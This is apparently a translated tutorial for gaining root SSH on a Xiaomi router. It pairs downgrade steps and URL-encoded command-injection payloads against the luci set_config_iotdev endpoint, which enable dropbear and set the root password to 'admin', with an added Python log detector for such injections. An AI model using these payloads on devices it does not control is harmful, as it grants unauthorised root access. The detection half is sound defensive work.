System downgrade
- Switch to the official firmware version that contains the vulnerability
- Download that downgrade version
- Replace the firmware: in the Xiaomi router admin console, select the downloaded version file and update to it
Enable SSH
Obtain the stok
After logging in to the Xiaomi router admin console you will see a URL of the following form; note down the stok value
http://192.168.31.1/cgi-bin/luci/;stok=%3CSTOK%3E/web/home#router
Command injection via the vulnerability
Note: replace the stok with the one noted down in the first step
http://192.168.31.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
Change the root password
http://192.168.28.1/cgi-bin/luci/;stok=3c8d638dd7dbae9b945a9fc3ecb1c2a6/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
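The requests above work because the `ssid` parameter of the `set_config_iotdev` endpoint is passed to a shell, so a value containing `;` terminates the intended argument and chains further commands. From the defender's side the tell-tale sign is shell metacharacters inside a field that should only ever hold an SSID or user name. The following detector, added here as an illustration and not part of the original page, URL-decodes the query string of requests to that endpoint and flags any parameter carrying such characters. The access-log format (client, method, target) and the sample lines are constructed for the example; the endpoint path and parameter names are the ones shown in the page.

```python
"""Flag shell-metacharacter injection attempts in luci API query parameters.

Added example for the set_config_iotdev injection described above; the log
format and sample lines below are constructed, not real device logs.
"""
from urllib.parse import urlsplit, parse_qs

# Endpoint whose ssid/user_id parameters reach a shell on the affected firmware.
VULNERABLE_ENDPOINT = "/api/misystem/set_config_iotdev"

# Characters that never belong in an SSID or user name value and that let an
# attacker end the intended argument and start a new shell command.
SHELL_METACHARS = set(";|&`$\n")

# Constructed access-log lines: "<client> <method> <path-with-query>".
SAMPLE_LOG = [
    "192.168.31.10 GET /cgi-bin/luci/;stok=abc123/web/home",
    "192.168.31.10 GET /cgi-bin/luci/;stok=abc123"
    + VULNERABLE_ENDPOINT + "?bssid=Xiaomi&user_id=alice&ssid=HomeWiFi",
    # Same shape as the page's payload: a leading "-h;" then chained commands.
    "10.0.0.5 GET /cgi-bin/luci/;stok=abc123"
    + VULNERABLE_ENDPOINT + "?bssid=Xiaomi&user_id=bob&ssid=-h%3B%20id%3B",
    "malformed line without a target",
]


def suspicious_params(url: str) -> dict:
    """Return {param: decoded_value} for every query parameter whose decoded
    value contains a shell metacharacter."""
    query = urlsplit(url).query
    # parse_qs performs the URL decoding, so %3B is compared as ';'.
    params = parse_qs(query, keep_blank_values=True)
    hits = {}
    for name, values in params.items():
        for value in values:
            if SHELL_METACHARS & set(value):
                hits[name] = value
    return hits


def scan_log(lines):
    """Return (client, hits) for each request to the vulnerable endpoint
    that carries a suspicious parameter value."""
    findings = []
    for line in lines:
        try:
            client, _method, target = line.split(" ", 2)
        except ValueError:
            # Line does not match the constructed format; skip it.
            continue
        if VULNERABLE_ENDPOINT not in urlsplit(target).path:
            continue
        hits = suspicious_params(target)
        if hits:
            findings.append((client, hits))
    return findings


if __name__ == "__main__":
    for client, hits in scan_log(SAMPLE_LOG):
        print(f"injection attempt from {client}: {hits}")
```

The check is deliberately strict: a legitimate SSID may contain spaces or quotes, but it has no reason to contain `;`, `|`, `&`, backticks or `$`, so alerting on those characters in this endpoint's parameters gives a low false-positive rate. The same list is what an input-validation fix on the device side would reject before the value ever reaches a shell.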